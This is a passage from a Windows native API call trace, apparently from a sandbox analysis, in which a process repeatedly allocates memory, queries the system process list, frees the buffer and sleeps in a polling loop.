Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.544] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.560] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.572] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.572] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.574] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.591] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.608] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.621] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.639] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.653] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.669] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.684] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.700] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.717] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.730] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.746] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.763] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.778] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.793] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.809] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.824] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.840] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0160.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0160.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0160.855] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0160.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0160.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0160.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0160.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 